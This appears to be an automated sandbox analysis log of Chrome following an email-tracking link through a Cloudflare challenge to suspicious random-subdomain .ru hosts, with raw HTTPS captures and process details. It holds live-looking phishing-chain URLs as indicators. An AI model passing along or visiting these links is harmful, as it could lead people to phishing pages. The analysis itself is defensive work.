                                                            CF-RAY: 8fdce23f0aae1a34-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2025-01-06 15:53:56 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                            Data Ascii: invalid


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            25192.168.2.449777104.18.94.414433132C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-06 15:54:03 UTC1172OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/2107253157:1736176446:TMvLSYbT8vPcOi1Ifdtwx5vV_ngLdJuCO6zr7ZzUf20/8fdce2128ada41f5/.wikaeMEd8mK1Oc7dG8c8h4xHhnK8Phr5lO.zmEbd8s-1736178829-1.1.1.1-i1sn.Pdwp4FePG5V5eJspdkjcJ6jDjNn60IHbxUTxEugw2h9wRfI0KDBXWk_pDw0 HTTP/1.1
                                                            Host: challenges.cloudflare.com
                                                            Connection: keep-alive
                                                            Content-Length: 34661
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            Content-type: application/x-www-form-urlencoded
                                                            CF-Chl-RetryAttempt: 0
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            CF-Challenge: .wikaeMEd8mK1Oc7dG8c8h4xHhnK8Phr5lO.zmEbd8s-1736178829-1.1.1.1-i1sn.Pdwp4FePG5V5eJspdkjcJ6jDjNn60IHbxUTxEugw2h9wRfI0KDBXWk_pDw0
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: */*
                                                            Origin: https://challenges.cloudflare.com
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/1q6ex/0x4AAAAAAA1mbxTaRk7hdxV-/auto/fbE/normal/auto/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2025-01-06 15:54:03 UTC16384OUTData Raw: 76 5f 38 66 64 63 65 32 31 32 38 61 64 61 34 31 66 35 3d 6a 4d 54 68 69 30 6f 67 65 30 65 4b 54 4b 6c 6f 42 4a 54 68 4e 62 4b 74 6f 73 25 32 62 44 2b 75 68 4b 59 70 4d 6f 39 2b 74 68 6f 42 58 59 54 4b 63 2b 7a 30 2b 4b 56 68 4b 43 2b 6b 68 66 65 30 66 2b 4c 42 37 2b 6f 55 48 2b 63 67 73 54 4c 2b 30 4f 2b 70 68 74 74 2b 4b 4a 6f 2b 72 2b 4f 68 74 38 38 2b 41 56 4b 39 2b 6a 45 68 2b 76 2b 30 6b 6f 39 38 37 6b 30 63 2b 66 49 37 72 75 35 2b 6c 70 5a 46 76 6a 46 62 2b 67 52 52 2b 4d 4b 2d 54 56 34 44 72 2b 71 6c 2b 4a 6b 2b 64 30 77 6d 72 52 34 56 2b 4c 70 57 36 55 68 45 65 76 55 69 70 48 71 6d 68 36 6a 30 4c 52 49 65 4d 34 52 4c 30 72 68 35 2b 6f 4f 46 68 61 74 65 46 6f 2b 44 44 48 4a 24 73 31 6c 64 45 68 74 47 70 70 7a 56 39 39 7a 51 63 7a 54 64 4f 54 6a 64
                                                            Data Ascii: v_8fdce2128ada41f5=jMThi0oge0eKTKloBJThNbKtos%2bD+uhKYpMo9+thoBXYTKc+z0+KVhKC+khfe0f+LB7+oUH+cgsTL+0O+phtt+KJo+r+Oht88+AVK9+jEh+v+0ko987k0c+fI7ru5+lpZFvjFb+gRR+MK-TV4Dr+ql+Jk+d0wmrR4V+LpW6UhEevUipHqmh6j0LRIeM4RL0rh5+oOFhateFo+DDHJ$s1ldEhtGppzV99zQczTdOTjd
                                                            2025-01-06 15:54:03 UTC16384OUTData Raw: 44 2b 2b 6f 31 49 37 32 68 2b 4d 2b 6a 2b 71 2b 65 2b 52 39 30 54 63 6e 2b 7a 4c 57 74 48 2b 6f 31 36 79 6e 74 2b 4b 4d 37 62 2b 44 2b 6f 56 6f 75 2b 66 35 74 54 6f 71 2b 63 68 63 54 2b 66 2b 78 2b 74 45 59 67 2b 67 54 71 35 56 76 2b 55 73 76 4d 6f 53 2b 56 56 6f 74 6f 46 65 2d 56 71 35 2b 71 2b 4a 56 4a 62 2b 6a 2b 78 56 71 4f 2b 65 2b 6c 2b 6f 34 2b 64 2b 63 6b 4b 5a 2b 71 2b 59 6b 74 47 6c 6a 68 64 56 4a 69 2b 5a 31 59 63 34 56 6f 76 2b 4c 68 4c 62 4b 32 62 59 68 6a 62 4b 66 2b 61 68 64 62 30 62 4d 71 68 54 4d 4b 43 2b 51 68 6a 4d 4b 6f 2b 6e 68 4e 74 30 6f 2b 5a 56 6a 74 30 4c 2b 35 56 4e 35 30 53 2b 76 56 66 74 4b 59 2b 36 56 66 35 30 57 2b 32 56 54 52 4b 57 2b 70 56 6a 52 4b 4a 2b 75 56 66 52 30 47 2b 51 56 54 4f 4b 46 2b 24 56 55 4f 30 61 2b 6b 6b
                                                            Data Ascii: D++o1I72h+M+j+q+e+R90Tcn+zLWtH+o16ynt+KM7b+D+oVou+f5tToq+chcT+f+x+tEYg+gTq5Vv+UsvMoS+VVotoFe-Vq5+q+JVJb+j+xVqO+e+l+o4+d+ckKZ+q+YktGljhdVJi+Z1Yc4Vov+LhLbK2bYhjbKf+ahdb0bMqhTMKC+QhjMKo+nhNt0o+ZVjt0L+5VN50S+vVftKY+6Vf50W+2VTRKW+pVjRKJ+uVfR0G+QVTOKF+$VUO0a+kk
                                                            2025-01-06 15:54:03 UTC1893OUTData Raw: 75 64 70 48 2b 77 57 66 6b 2b 72 5a 30 66 48 74 2b 54 4e 7a 37 2d 39 6f 51 62 24 4c 59 34 2b 47 42 68 65 63 4e 30 45 46 5a 68 2b 62 4f 44 6b 62 6b 2b 64 65 37 73 32 43 31 53 64 61 68 56 45 2b 68 45 62 2b 44 6b 4b 6d 68 6c 56 5a 4d 2b 55 69 6c 54 73 76 2b 54 33 24 68 63 33 6f 39 2b 41 2b 66 68 4a 6b 2b 61 67 7a 32 46 61 61 43 51 34 41 76 38 24 66 74 55 68 4b 2d 6f 5a 2b 67 54 2b 78 66 6a 51 4f 56 6f 53 58 49 32 4e 52 4a 64 6f 51 6b 51 4d 4b 59 77 71 6e 49 56 4b 66 6f 35 59 43 56 4b 66 6f 69 2b 4c 2b 74 6b 67 72 5a 72 5a 4b 66 75 33 62 2d 6f 4c 7a 76 52 65 45 4d 6f 59 43 62 61 46 67 43 70 45 76 4e 35 51 6f 68 6f 49 2b 78 2b 6f 69 77 5a 6b 47 79 43 74 58 6b 67 43 79 69 48 2b 4b 38 34 63 7a 76 73 74 2b 59 44 2d 75 43 31 33 45 31 41 4b 68 36 6f 63 57 24 4b 76
                                                            Data Ascii: udpH+wWfk+rZ0fHt+TNz7-9oQb$LY4+GBhecN0EFZh+bODkbk+de7s2C1SdahVE+hEb+DkKmhlVZM+UilTsv+T3$hc3o9+A+fhJk+agz2FaaCQ4Av8$ftUhK-oZ+gT+xfjQOVoSXI2NRJdoQkQMKYwqnIVKfo5YCVKfoi+L+tkgrZrZKfu3b-oLzvReEMoYCbaFgCpEvN5QohoI+x+oiwZkGyCtXkgCyiH+K84czvst+YD-uC13E1AKh6ocW$Kv
                                                            2025-01-06 15:54:04 UTC1361INHTTP/1.1 200 OK
                                                            Date: Mon, 06 Jan 2025 15:54:03 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4624
                                                            Connection: close
                                                            cf-chl-out-s: skByLNS3T5TJyWn6QS+Q2TelX4ELER5m4yZunwE2jvfmv2/EiPBLrdkADtrEBD4rhhYLQ1cIx1ppF90CxbTA5/iFulVtXpnwfZ4ltHjWUIB72gWFEZpwF99x5gWXkJeX9p+Sq4IcCScUlYsjcVh8oWM3JDI0avm7JGWFdRQwge7s1E/xBlovuVJsvM86yB7Z5EfjP6hDpaJ42e3LivxOxY21U0nWpPS3qOuxL6bHe1kgxyag5kcnR4HmGBLiunYMMbLrfU+iqTHLjnBDaxM9voPbK6GG40c5tFhyLXpn80OouFYgx6vlx3fcftfwCGkZ/hmWR0A50YIY0be1UT00t85aDpMGO8MtKY1lUyjo6gdQ8bpgI2F79R4NN/TfD3mzvg96tt5AtA0hUZOH7O0+Apd2dVjDcjGVdHvIaO8RvAEvSbx2LSS6t4vOYoFnAWw1VXV9kK5b+dy+/X6oy/LGXmfbEkhxW3eOmK4Oqqs2xGTgzD90jKc1HE+SSa7mV9V+Yt2tGeorz+K29n/TPtKTfLjjxONc24cHEAjZaUBqZsgqGA7iJ4E28l+DmCCUOo288Qbfg06Ti503OcYDksxeC2NSayGKRQxyxogG8ZwbjdxcJrncT2l5yOlfTQEiUgy47/zVDiX1tqmfzJgPfKfuxJ6EVt8aKiI9kcqSNh4VzF+ycj0zNC0uSvKRoGxtJb1kUjjJNC1pmMPZerSb9t9j26a2QI/2n8xI0tRsqsqxcyMGxaFGzqdjVZhc4Ae0jseAh56A62dLqoNRuMJmH1v/w+d44xSsjs2tHLVEN5Hlf9s9suFNOTolK5kazwiEw0m0HjDGCl/zhEl6R05VwxsiJtAAlcx/8TxLpV0kBSKLFAdHH7q9s7BTJIo9VWTdDx9J9cXIWqWTbpZXD7wPHa7YT9Gy/JKKZCwie8/2h0fRntnTJGqprYrH11hSvlxHe15ov7gNTdXvpihJ+Qb0XtAhDx5Mcjmi2caXojkrovJlJUw=$jIBEJ [TRUNCATED]
                                                            cf-chl-out: Z0IhqlBUcZHZ9DNgdwjErB5+RDd8Qa0O4h8BeWY7OYZnBNuk4NCSqyMD9HK8n6OBXaUJOIA8P/3I7dU1BIvOhfy9JSPDwV7T8c4nefwMBQ==$pJsSruEhUe9KACqX
                                                            Server: cloudflare
                                                            CF-RAY: 8fdce26dcb058c65-EWR
                                                            2025-01-06 15:54:04 UTC32INData Raw: 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                            Data Ascii: alt-svc: h3=":443"; ma=86400
                                                            2025-01-06 15:54:04 UTC1345INData Raw: 76 4c 36 77 70 58 36 6b 74 72 79 70 70 38 61 36 74 61 4f 67 79 72 75 78 6f 73 6d 56 30 72 62 59 6c 73 61 76 6d 5a 62 61 72 74 44 4f 6d 74 37 50 30 61 54 51 75 75 57 70 75 61 75 2f 75 73 69 35 77 37 37 4c 71 73 76 32 35 62 50 57 73 74 4c 30 36 63 37 4d 74 73 33 5a 76 73 2f 4e 7a 74 66 6a 77 2f 6a 66 42 62 2f 6d 32 39 6f 45 7a 41 50 54 42 41 77 4d 45 65 49 4a 35 2b 55 52 37 52 44 36 46 51 50 39 37 68 34 56 45 76 48 66 44 41 62 32 49 4f 67 46 34 68 34 70 42 65 38 6f 4c 67 34 78 41 77 4d 4c 2b 7a 48 34 4d 42 30 30 2b 6a 77 50 4f 52 67 69 46 7a 67 62 48 6b 55 58 4a 78 77 61 50 79 49 47 49 6b 6c 4f 4c 7a 5a 4f 53 56 30 57 58 44 42 4d 56 6d 45 33 4d 69 34 65 4e 42 34 69 4e 6a 68 62 4a 47 5a 75 51 33 46 4a 50 56 78 4e 59 6d 74 42 61 46 70 70 55 32 64 48 56 6a 63
                                                            Data Ascii: vL6wpX6ktrypp8a6taOgyruxosmV0rbYlsavmZbartDOmt7P0aTQuuWpuau/usi5w77Lqsv25bPWstL06c7Mts3Zvs/Nztfjw/jfBb/m29oEzAPTBAwMEeIJ5+UR7RD6FQP97h4VEvHfDAb2IOgF4h4pBe8oLg4xAwML+zH4MB00+jwPORgiFzgbHkUXJxwaPyIGIklOLzZOSV0WXDBMVmE3Mi4eNB4iNjhbJGZuQ3FJPVxNYmtBaFppU2dHVjc
                                                            2025-01-06 15:54:04 UTC1369INData Raw: 48 61 46 6f 48 42 32 73 4a 65 79 75 59 71 66 77 4c 75 41 75 4c 65 39 68 4b 57 2b 77 34 4f 4a 68 63 57 33 73 4d 58 4c 68 62 33 51 6c 71 47 34 79 36 76 63 74 5a 58 49 73 71 76 59 74 38 76 69 34 62 71 78 36 64 2f 6b 77 61 50 66 76 71 47 70 37 64 71 73 37 2b 72 66 31 65 58 75 7a 61 33 36 39 39 43 34 36 51 48 35 33 74 7a 36 37 73 58 6a 39 51 49 41 78 67 66 35 32 51 30 49 35 39 33 54 45 41 44 31 42 41 7a 75 42 66 51 54 32 68 6a 38 32 42 7a 39 47 39 77 50 39 64 6f 67 4a 4e 30 47 4b 52 67 44 42 69 34 47 49 51 73 70 43 51 38 56 4c 68 41 6f 47 44 50 38 4b 52 6b 31 41 67 45 44 2f 53 5a 41 4a 55 52 45 49 79 56 4d 53 53 63 71 55 55 30 72 4c 6c 42 4f 57 45 46 4f 52 43 70 54 56 6a 41 64 58 56 31 4d 4c 6a 74 61 49 31 78 6d 5a 69 6f 6f 4b 6d 56 61 53 30 70 6b 52 45 38 39
                                                            Data Ascii: HaFoHB2sJeyuYqfwLuAuLe9hKW+w4OJhcW3sMXLhb3QlqG4y6vctZXIsqvYt8vi4bqx6d/kwaPfvqGp7dqs7+rf1eXuza3699C46QH53tz67sXj9QIAxgf52Q0I593TEAD1BAzuBfQT2hj82Bz9G9wP9dogJN0GKRgDBi4GIQspCQ8VLhAoGDP8KRk1AgED/SZAJUREIyVMSScqUU0rLlBOWEFORCpTVjAdXV1MLjtaI1xmZiooKmVaS0pkRE89
                                                            2025-01-06 15:54:04 UTC1369INData Raw: 69 38 6b 58 46 2b 75 4c 32 76 64 72 2b 5a 68 5a 50 48 6e 70 36 6e 77 73 69 6b 75 4d 4b 70 7a 71 2b 6a 6c 70 4c 44 78 61 6a 50 6e 4e 72 58 6c 71 43 38 30 35 75 79 77 4c 33 45 73 63 54 64 74 72 2b 6c 72 73 32 72 71 63 61 73 73 2f 62 58 30 72 6a 53 79 65 66 4f 31 66 44 4d 75 74 6e 6a 37 73 41 44 31 38 44 43 2f 51 58 49 39 67 76 4b 32 66 67 47 38 38 33 71 7a 41 44 71 39 52 50 59 47 50 73 62 33 4f 37 32 49 41 73 43 34 74 33 36 2f 51 59 6f 4a 41 59 4d 4b 2b 73 59 45 43 73 73 38 52 49 77 39 42 49 56 4e 51 33 34 48 44 67 32 51 51 34 33 4c 66 55 37 4e 77 51 65 4d 54 39 46 43 69 6c 4c 53 53 49 72 53 54 78 42 49 6b 39 41 45 52 51 53 56 44 63 32 55 44 46 49 54 31 59 33 50 6b 5a 5a 4f 46 77 66 57 79 63 70 58 32 56 43 54 7a 73 70 4d 44 38 2f 62 31 39 4f 4f 58 4e 30 54
                                                            Data Ascii: i8kXF+uL2vdr+ZhZPHnp6nwsikuMKpzq+jlpLDxajPnNrXlqC805uywL3EscTdtr+lrs2rqcass/bX0rjSyefO1fDMutnj7sAD18DC/QXI9gvK2fgG883qzADq9RPYGPsb3O72IAsC4t36/QYoJAYMK+sYECss8RIw9BIVNQ34HDg2QQ43LfU7NwQeMT9FCilLSSIrSTxBIk9AERQSVDc2UDFIT1Y3PkZZOFwfWycpX2VCTzspMD8/b19OOXN0T
                                                            2025-01-06 15:54:04 UTC541INData Raw: 38 65 38 44 42 6c 61 6d 31 78 61 47 2f 79 63 69 46 72 49 69 6a 7a 38 4c 4b 70 38 69 33 79 37 76 48 33 4a 58 59 6d 62 62 53 32 71 43 67 6e 61 4c 6e 70 36 43 70 75 73 48 67 7a 2b 53 39 38 4e 50 52 34 4b 33 74 34 4d 54 31 75 4e 58 39 2f 4e 47 31 32 67 50 41 30 62 73 43 2f 64 37 55 41 64 2f 6c 41 41 7a 4d 43 65 34 52 44 66 48 51 44 41 38 41 47 52 63 55 46 65 6f 53 46 74 6a 5a 48 68 33 75 37 79 54 31 48 4f 51 6c 46 66 6b 48 4b 42 63 47 37 69 67 64 37 2f 48 74 39 52 59 73 4c 41 34 4c 46 6a 59 52 2f 52 6f 75 4f 6a 45 4e 4d 6a 45 69 49 6b 67 31 47 78 5a 41 4d 43 38 62 55 41 34 47 4c 6b 67 54 4a 79 52 5a 4c 45 51 38 58 55 42 49 50 47 46 45 51 6a 39 59 4f 45 5a 45 57 32 4a 47 52 47 31 5a 54 6b 70 78 51 79 70 42 61 56 68 4f 56 47 77 36 56 6c 78 78 50 6c 70 67 64 48
                                                            Data Ascii: 8e8DBlam1xaG/yciFrIijz8LKp8i3y7vH3JXYmbbS2qCgnaLnp6CpusHgz+S98NPR4K3t4MT1uNX9/NG12gPA0bsC/d7UAd/lAAzMCe4RDfHQDA8AGRcUFeoSFtjZHh3u7yT1HOQlFfkHKBcG7igd7/Ht9RYsLA4LFjYR/RouOjENMjEiIkg1GxZAMC8bUA4GLkgTJyRZLEQ8XUBIPGFEQj9YOEZEW2JGRG1ZTkpxQypBaVhOVGw6VlxxPlpgdH


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            26192.168.2.449778104.18.95.414433132C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-06 15:54:04 UTC599OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/2107253157:1736176446:TMvLSYbT8vPcOi1Ifdtwx5vV_ngLdJuCO6zr7ZzUf20/8fdce2128ada41f5/.wikaeMEd8mK1Oc7dG8c8h4xHhnK8Phr5lO.zmEbd8s-1736178829-1.1.1.1-i1sn.Pdwp4FePG5V5eJspdkjcJ6jDjNn60IHbxUTxEugw2h9wRfI0KDBXWk_pDw0 HTTP/1.1
                                                            Host: challenges.cloudflare.com
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2025-01-06 15:54:04 UTC379INHTTP/1.1 404 Not Found
                                                            Date: Mon, 06 Jan 2025 15:54:04 GMT
                                                            Content-Type: application/json
                                                            Content-Length: 7
                                                            Connection: close
                                                            cf-chl-out: sg2z5G/nMJiKEHC2Sd9CpvzYoY7gvtt+4Ro=$A+Ov2lUDxi9Zw4ym
                                                            cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                            Server: cloudflare
                                                            CF-RAY: 8fdce272e8727279-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2025-01-06 15:54:04 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                            Data Ascii: invalid


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            27192.168.2.449779104.21.112.14433132C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-06 15:54:04 UTC663OUTGET /aRfKqGivICwMfkvMblhotmkCKTJPGIIMLUXKGZWRHMEJQTKQBBOQYFNUUNOTELHTTCK HTTP/1.1
                                                            Host: xjjd3dlv9wlu073ipsdppi0oqt2jogok8v7diqn7clucolkwlb.gageodeg.ru
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: */*
                                                            Origin: https://gimd.lamantatio.ru
                                                            Sec-Fetch-Site: cross-site
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Referer: https://gimd.lamantatio.ru/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2025-01-06 15:54:05 UTC892INHTTP/1.1 200 OK
                                                            Date: Mon, 06 Jan 2025 15:54:05 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Access-Control-Allow-Origin: *
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OYJJu5zaKNpNBYFI6NgTyc%2BekZJM53Qb2uN4EfvfS6YF2BDiR0cFL10z24vJfo8U8oFEtCBVLUrtkE4ROThIbuAp6%2BisDHylhns4H6KiNSYC2shwMc5pKx%2FBIWRHqjYg%2BvCijAb5D5XMgqhLEnVjSVos2%2BlhdyHe2uyyILKqVt7oI86O0R7L73Zq%2FAq4sywnwQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8fdce2736cb60f5b-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1653&min_rtt=1638&rtt_var=646&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2825&recv_bytes=1241&delivery_rate=1654390&cwnd=221&unsent_bytes=0&cid=4d3a499c01fa2654&ts=563&x=0"
                                                            2025-01-06 15:54:05 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                            Data Ascii: 11
                                                            2025-01-06 15:54:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            28192.168.2.449782104.21.32.14433132C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-06 15:54:05 UTC453OUTGET /aRfKqGivICwMfkvMblhotmkCKTJPGIIMLUXKGZWRHMEJQTKQBBOQYFNUUNOTELHTTCK HTTP/1.1
                                                            Host: xjjd3dlv9wlu073ipsdppi0oqt2jogok8v7diqn7clucolkwlb.gageodeg.ru
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2025-01-06 15:54:06 UTC896INHTTP/1.1 200 OK
                                                            Date: Mon, 06 Jan 2025 15:54:06 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Access-Control-Allow-Origin: *
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i%2B1pk9pOd8Z5Ef%2BhzmFXAoZhpc8tYakp25OSoc6m7uol0KIRBLy6%2FiQEiFmGTey1uvUMJup6vO6WCkFEIA4M1uExrMGiawm6vUg31HqB7%2Fid9DHKb66plzhcXpaG0I3dAIsGSGDpZUAHU9mop4rgjaebVGE%2B8FjH%2B2YVFvGyXMhW4rrK9FmF7%2BONGigvgT%2FPrQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8fdce27ab9b28cda-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1846&min_rtt=1829&rtt_var=698&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2825&recv_bytes=1031&delivery_rate=1596500&cwnd=242&unsent_bytes=0&cid=5f270c0c6e3d3ed8&ts=585&x=0"
                                                            2025-01-06 15:54:06 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                            Data Ascii: 11
                                                            2025-01-06 15:54:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Click to jump to process

                                                            Click to jump to process

                                                            Click to jump to process

                                                            Target ID:0
                                                            Start time:10:53:19
                                                            Start date:06/01/2025
                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                            Imagebase:0x7ff76e190000
                                                            File size:3'242'272 bytes
                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:false

                                                            Target ID:2
                                                            Start time:10:53:21
                                                            Start date:06/01/2025
                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2260 --field-trial-handle=2208,i,4042262563919958383,11686839205852121659,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                            Imagebase:0x7ff76e190000
                                                            File size:3'242'272 bytes
                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:false

                                                            Target ID:3
                                                            Start time:10:53:27
                                                            Start date:06/01/2025
                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://u1427642.ct.sendgrid.net/ss/c/u001.FNsPiHUBxMFL4Ws_sT4ClbcHyliF9aYYaCWsJtTBDNtLQl9ZlDrQgriglBxgGE9RruWvR9yDlYrq9sYDXn9m2QBHZNBT8lOXoCfvqrsEWDs/4cw/m3JxW_wISSqopMaBzhDAkg/h0/h001.ecTtgKjf7ojZqznHApcdI1yRZPedj7DDFJ38_Fw-Xx8"
                                                            Imagebase:0x7ff76e190000
                                                            File size:3'242'272 bytes
                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:true

                                                            No disassembly